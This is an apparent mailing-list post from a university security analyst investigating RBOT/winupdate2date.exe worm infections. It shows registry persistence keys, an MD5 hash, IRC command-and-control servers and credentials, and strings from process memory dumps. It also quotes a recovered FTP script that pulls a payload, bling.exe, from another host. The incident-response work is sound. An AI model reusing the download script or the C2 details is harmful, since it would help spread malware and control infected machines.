Winupdate2date.exe: New worm variant?

Anderson Johnston <[email protected]>
Newsgroups gmane.comp.security.intrusions
Message-ID <[email protected]>

Going over a Windows machine infected with RBOT:

------------------------------------------------------------------
------------------ First Machine ---------------------------------
! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    Microsoft Update Machine    REG_SZ  servicz.exe
    msupdates   REG_SZ  msupdt.exe
[root@gecko 040920-1]# cd ../040920-2
[root@gecko 040920-2]# more run.reg
------------------------------------------------------------------




I came across a file that seemed to point to another campus machine as the
source of the infection:

------------------------------------------------------------------
# cat o
open 130.85.ccc.ddd 19302
user 1 1
get bling.exe
quit


------------------------------------------------------------------
------------------ Second Machine --------------------------------


This second machine turned have an infection with different (extra?)
characteristics:

------------------------------------------------------------------
# cat run.reg

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    Cryptographic Service       REG_SZ  C:\WINDOWS\System32\ioplmwb.exe
    msupdates   REG_SZ  msupdt.exe
    WindowsRegKey update2date   REG_SZ  winupdate2date.exe


------------------------------------------------------------------
------------------ Third Machine ---------------------------------


Then we turned up a third machine in the same building that also had
winupdate2date.exe (and did not have msupdt.exe):

------------------------------------------------------------------
# cat run.reg

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    McAfeeUpdaterUI     REG_SZ  "C:\Program Files\Network
Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
    ShStatEXE   REG_SZ  "C:\Program Files\Network
Associates\VirusScan\SHSTAT.EXE" /STANDALONE
    NDPS        REG_SZ  C:\WINDOWS\System32\dpmw32.exe
    NWTRAY      REG_SZ  NWTRAY.EXE
    WindowsRegKey update2date   REG_SZ  winupdate2date.exe

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents
------------------------------------------------------------------


The file winupdate2date.exe has MD5 hash:

	047379e3e9d02ced7e5dbf046a9b1f4c


I haven't been able to find a reference for it.  Has anyone else seen it
(and/or know anything about it)?

BTW, we found the third machine through a snort rule that detects RBOT
IRC traffic.  It's IRC channel was to server 66.111.42.128.

09/21/04 14:19:28 dns 66.111.42.128
nslookup 66.111.42.128
Canonical name: unknown.sagonet.net
Addresses:
  66.111.42.128




The following text strings were at the beginning of the (slightly
sanitized) process memory dumps of winupdate2date.exe on the second
and third machines:

------------------ PmDump from Second Machine ---------------------


# strings pmdump_3888_winupdate2date.exe.txt | more
[SCAN]: Random Scanner Avvia4
PONG :irc.NoNet.net
Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2052150 thre
[MAIN]: Joined channel: #!$!#.
PONG
:irc.NoNet.net
PING :irc.NoNet.net
PING
vwmdqlpk
2052\
<DNS name of system deleted from this line - AFJ>
 NICK vwmdqlpk
USER oimxhfsl 0 0 :vwmdqlpk
oimxhfsl
server.maxshells.com
#!$!#
letmein
vwmdqlpk
WinSock 2.0
Running
winupdate2date
 &   !
.exe
winupdate2date.exe
C:\WINDOWS\System32
C:\WINDOWS\System32\winupdate2date.exe
CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
tuvwxyz{|}~
w[IDENTD]: Server running on Port: 113.
IsProcessorFeature`
Actx
[IY-
SsHd,
[IY-H
SsHd,
C:\WINDOWS\System32\winupdate2date.exe 1792
"C:\WINDOWS\system32\winupdate2date.exe"

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
-v1.3.14.3.2.22
er\Advanced
-v1.2.840.113549.1.1.1
3v8?
3v`?
CryptSIPDllPutSignedDataMsg
CryptSIPDllGetSignedDataMsg
CryptSIPDllRemoveSignedDataMsg
CryptSIPDllCreateIndirectData
CryptSIPDllVerifyIndirectData
CryptSIPDllIsMyFileType
CryptSIPDllIsMyFileType2
CryptDllExportPublicKeyInfoEx


------------------- PmDump from Third Machine --------------------------

[root@gecko 040920-3]# strings pmdump_1156_winupdate2date.exe.txt | more
[SCAN]: Random Scanner Avvia4
PONG :irc.NoNet.net
Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2046150 thre
[MAIN]: Joined channel: #!$!#.
PONG
:irc.NoNet.net
PING :irc.NoNet.net
PING
ongvjfr
2046H
<DNS name of system deleted from this line - AFJ>
 NICK ongvjfr
USER webxah 0 0 :ongvjfr
webxah
server.maxshells.com
#!$!#
letmein
ongvjfr
WinSock 2.0
Running
winupdate2date
 &   !
.exe
winupdate2date.exe
C:\WINDOWS\System32
C:\WINDOWS\System32\winupdate2date.exe
CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
tuvwxyz{|}~
w[IDENTD]: Server running on Port: 113.
IsProcessorFeature
Actx
[IY-
SsHd,
[IY-H
SsHd,
C:\WINDOWS\System32\winupdate2date.exe 1792 "C:\WINDOWS\system32\winupdate2date.exe"
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~


------------------------------------------------------------------------------
** Andy Johnston ([email protected])          *                                 **
**                                        * PGP key:(afj2002) 4096/8448B056 **
** Office of Information Technology, UMBC *   4A B4 96 64 D9 B6 EF E3 21 9A **
** 410-455-2583 (v)/410-455-1065 (f)      *   46 1A 37 11 F5 6C 84 48 B0 56 **
------------------------------------------------------------------------------
_______________________________________________
Intrusions mailing list
[email protected]
http://www.dshield.org/mailman/listinfo/intrusions
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.